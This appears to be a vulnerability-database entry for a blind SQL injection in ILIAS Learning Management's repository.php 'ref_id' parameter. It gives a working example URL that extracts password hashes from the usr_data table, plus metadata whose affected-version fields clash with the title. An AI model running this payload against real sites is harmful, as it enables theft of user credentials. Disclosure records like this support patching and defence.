vendor:
ILIAS Learning Management
by:
Lidloses_Auge
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ILIAS Learning Management
Affected Version From: 3.7.2004
Affected Version To: 3.7.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:ilias_project:ilias
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
ILIAS Learning Management <= 3.7.4 - SQL Injection Vulnerability
The GET Parameter 'ref_id' in 'repository.php' contains a Blind SQL Injection Vulnerability. Usertable: usr_data, Important columns: usr_id, login, passwd. Example: http://www.site.com/repository.php?cmd=frameset&ref_id=1+and+ascii(substring((select+passwd+from+usr_data+limit+0,1),1,1))>50--
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.